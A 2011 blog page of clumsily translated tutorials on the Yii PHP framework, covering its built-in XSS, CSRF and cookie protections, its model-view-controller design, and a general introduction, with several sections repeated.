One of the excess Yii is Yii has a standard for security against many types of attacks from outside. Here is the Security Standards of Yii Framework include:
1. Cross Site Scripting prevention
Cross-site scripting or cross-site scripting Cross (also known as XSS) occurs when a web application gathers malicious data from user. Attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool users of other applications and collect data from them. Yii includes HTMLPurifier products and providing lining HTMLPurifier CHtmlPurifier components. This component is able to remove all malicious code with a thoroughly audited, secure yet have a list of allowed and ensure content is filtered according to the standard.
2. Prevention of Cross-Site Request Forgery
Attacks Cross-Site Request Forgery (CSRF) or Babysitting Cross-site Request Forgery occurs when a malicious web site lead to web browser user to perform unwanted actions on a secure site. Yii implements CSRF prevention scheme to help defeat the attack-POST-based storage based on a random value in the cookie and comparing this value with the value passed via POST requests.
3. Cookie Attack Prevention
Protect cookies from being attacked is very important, as session IDs are commonly stored in a cookie. Yii implements a cookie validation scheme that prevents cookies being modified.
Monday, October 31, 2011
Yii Framework Tutorials
Sunday, October 30, 2011
Model-View-Controller (MVC) Yii Framework
Once before I have discussed a bit about Model-View-Controller (MVC) Yii Framework on the post About Yii Framework, now I will discuss more about what else is MVC and how it works.
Yii framework design pattern implements a model-view-controller (MVC), which is widely adopted in Web programming. Model-view-controller (MVC) aims to separate business logic from user interface considerations so that developers can more easily change any part without affecting the others.
Model represents the information (data) and business rules. The model is an instance of a class that CModel or decrease CModel. The model is used to store data and relevant business rules.
A model represents a single data object. Can be either a row in a database table or an html form with user input field. Every field or a data object is represented by an attribute model. Attributes have a label and can be validated against a set of rules.
Yii implements two types of model: Model record form and active. They decrease from the same base class, CModel.
A model form is an instance of CFormModel. The model form is used to store data collected from user input. This data is usually collected, used and then discarded. For example, the login page, we can use the model form to represent the username and password information provided by the user. For more information, please refer to Working with Forms
Active Record (AR) is a design pattern is used for abstracting database access in the form of object-orientation. Each object is an instance of CActiveRecord AR or a sub-class of that class, represents a single row in a database table. The fields in the row can be represented by the property on the object the AR. Detailed information on the AR can be found in Active Record.
View contains user interface elements such as text, input form. View is a PHP script that contains a particular element of the user interface. View could contain PHP code, but code is not recommended to change the data model and should remain relatively simple. In order to maintain the spirit of separation of logic and appearance, a large part of the logic should be placed in the controller instead of a model or view.
View has a name that is used to identify the script file to display when rendering. View the same name as the file name of the script of his view. For example, referring to the file view edit the script file named edit.php. To render view, call CController :: render () with the name of the view. The method will look for view files in the directory corresponding protected / views / ControllerID.
In the script view, we can access the controller using $ this instance. Furthermore, we can draw any controller to evaluate the properties $ this-> PropertyName in the view.
View is divided into 3 parts
Layout. Layout (layout) is a special view that is used to decorate the display. Usually contains the user interface which is common among some of the view. For example, a layout may contain a header and a footer and include the content view.
Widget. Widgets are istance of a class of children CWidget or CWidget. Component that is primarily intended for purposes of appearance. Widgets are usually included in the script view to produce a complex user interface and stand-alone. For example, a calendar widget can be used to prepare a calendar user interface is complex. Widget allows reusability (reuse) the better the user interface.
View System. View refers to the display system used by Yii to display errors and recording (logging) information. For example, when a user requests to a controller or action that does not exist, Yii will raise an exception that describes the error. Yii displays the exception using a particular system view.
View naming system to follow some rules. Names like errorXXX refer to the display to display the error code CHttpException with XXX. For example, if CHttpException raised with error code 404, error404 view will be displayed.
Yii provides a set of default system view that is placed under the framework / views. View-This view can be customized to create the same display file with the same name under protected / views / system.
The controller manages the communication between the model and view. A controller is an instance of the derived class CController or CController. The controller is made by the application when the user to request it. When walking, do the action that the controller is requesting that usually require a model and create the appropriate view. An action, in its simplest form is actually just a controller class method whose name starts with the word action.
The controller has a standard action. When a user requests do not specify where the action is executed, the default action to be executed. The default action is usually named as the index. The default action can be changed by setting the instance variable public, CController :: defaultAction.
Yii framework design pattern implements a model-view-controller (MVC), which is widely adopted in Web programming. Model-view-controller (MVC) aims to separate business logic from user interface considerations so that developers can more easily change any part without affecting the others.
Model represents the information (data) and business rules. The model is an instance of a class that CModel or decrease CModel. The model is used to store data and relevant business rules.
A model represents a single data object. Can be either a row in a database table or an html form with user input field. Every field or a data object is represented by an attribute model. Attributes have a label and can be validated against a set of rules.
Yii implements two types of model: Model record form and active. They decrease from the same base class, CModel.
A model form is an instance of CFormModel. The model form is used to store data collected from user input. This data is usually collected, used and then discarded. For example, the login page, we can use the model form to represent the username and password information provided by the user. For more information, please refer to Working with Forms
Active Record (AR) is a design pattern is used for abstracting database access in the form of object-orientation. Each object is an instance of CActiveRecord AR or a sub-class of that class, represents a single row in a database table. The fields in the row can be represented by the property on the object the AR. Detailed information on the AR can be found in Active Record.
View contains user interface elements such as text, input form. View is a PHP script that contains a particular element of the user interface. View could contain PHP code, but code is not recommended to change the data model and should remain relatively simple. In order to maintain the spirit of separation of logic and appearance, a large part of the logic should be placed in the controller instead of a model or view.
View has a name that is used to identify the script file to display when rendering. View the same name as the file name of the script of his view. For example, referring to the file view edit the script file named edit.php. To render view, call CController :: render () with the name of the view. The method will look for view files in the directory corresponding protected / views / ControllerID.
In the script view, we can access the controller using $ this instance. Furthermore, we can draw any controller to evaluate the properties $ this-> PropertyName in the view.
View is divided into 3 parts
Layout. Layout (layout) is a special view that is used to decorate the display. Usually contains the user interface which is common among some of the view. For example, a layout may contain a header and a footer and include the content view.
Widget. Widgets are istance of a class of children CWidget or CWidget. Component that is primarily intended for purposes of appearance. Widgets are usually included in the script view to produce a complex user interface and stand-alone. For example, a calendar widget can be used to prepare a calendar user interface is complex. Widget allows reusability (reuse) the better the user interface.
View System. View refers to the display system used by Yii to display errors and recording (logging) information. For example, when a user requests to a controller or action that does not exist, Yii will raise an exception that describes the error. Yii displays the exception using a particular system view.
View naming system to follow some rules. Names like errorXXX refer to the display to display the error code CHttpException with XXX. For example, if CHttpException raised with error code 404, error404 view will be displayed.
Yii provides a set of default system view that is placed under the framework / views. View-This view can be customized to create the same display file with the same name under protected / views / system.
The controller manages the communication between the model and view. A controller is an instance of the derived class CController or CController. The controller is made by the application when the user to request it. When walking, do the action that the controller is requesting that usually require a model and create the appropriate view. An action, in its simplest form is actually just a controller class method whose name starts with the word action.
The controller has a standard action. When a user requests do not specify where the action is executed, the default action to be executed. The default action is usually named as the index. The default action can be changed by setting the instance variable public, CController :: defaultAction.
About Yii Framework
Yii is one of PHP framework object-oriented programming (OOP) component-based, high-performance for the development of large-scale Web applications. Name Yii (pronounced as / i :/) stands for "Yes It Is".
This project was first developed by a master named Qiang Xue in January 2008 and at December 2008 Yii 1.0 was released to the public. And it's amazing, just a few years ago is now a Yii PHP framework that demand a lot of people.
Yii PHP framework beyond the others in terms of efficiency, feature-richness, and clarity of documentation.
Yii framework has advantages compared to other frameworks. Here are some frameworks performance comparison chart:
From picture, look Yii framework performance beyond of other PHP framework. Yii has support for caching, this is explicitly designed to work efficiently with AJAX. Yii is much faster because of using the technique of "lazy loading" extensively. For example, do not include the class file to classes used for the first time, and it did not create the object until the object is accessed for the first time. Caching is a simple and effective way to improve the performance of Web applications. By storing data in the cache relatively static and take it from the cache when needed, it can save the time required in generating the data.
Yii implements the design pattern of the model-view-controller (MVC), which aims to separate logic from user interface considerations in order to more easily change any part without affecting the others. In MVC, the model represents the information (data) and business rules; view contains user interface elements such as text, input forms, while the controller manages the communication between the model and view.
Yii also introduced a front-controller, called Applications, which encapsulates the execution context to process a request. Application to collect some information about the user request and then sends it to the appropriate controller for further handling.
To run a applications web based Yii, required web server that supports PHP 5.1.0 or later. You can download Yii for free from the official website here: http://www.yiiframework.com/download/
This project was first developed by a master named Qiang Xue in January 2008 and at December 2008 Yii 1.0 was released to the public. And it's amazing, just a few years ago is now a Yii PHP framework that demand a lot of people.
Yii PHP framework beyond the others in terms of efficiency, feature-richness, and clarity of documentation.
Yii framework has advantages compared to other frameworks. Here are some frameworks performance comparison chart:
 |
| RPS: Request per second - APC: Advanced php caching |
Yii implements the design pattern of the model-view-controller (MVC), which aims to separate logic from user interface considerations in order to more easily change any part without affecting the others. In MVC, the model represents the information (data) and business rules; view contains user interface elements such as text, input forms, while the controller manages the communication between the model and view.
Yii also introduced a front-controller, called Applications, which encapsulates the execution context to process a request. Application to collect some information about the user request and then sends it to the appropriate controller for further handling.
To run a applications web based Yii, required web server that supports PHP 5.1.0 or later. You can download Yii for free from the official website here: http://www.yiiframework.com/download/
Subscribe to:
Posts (Atom)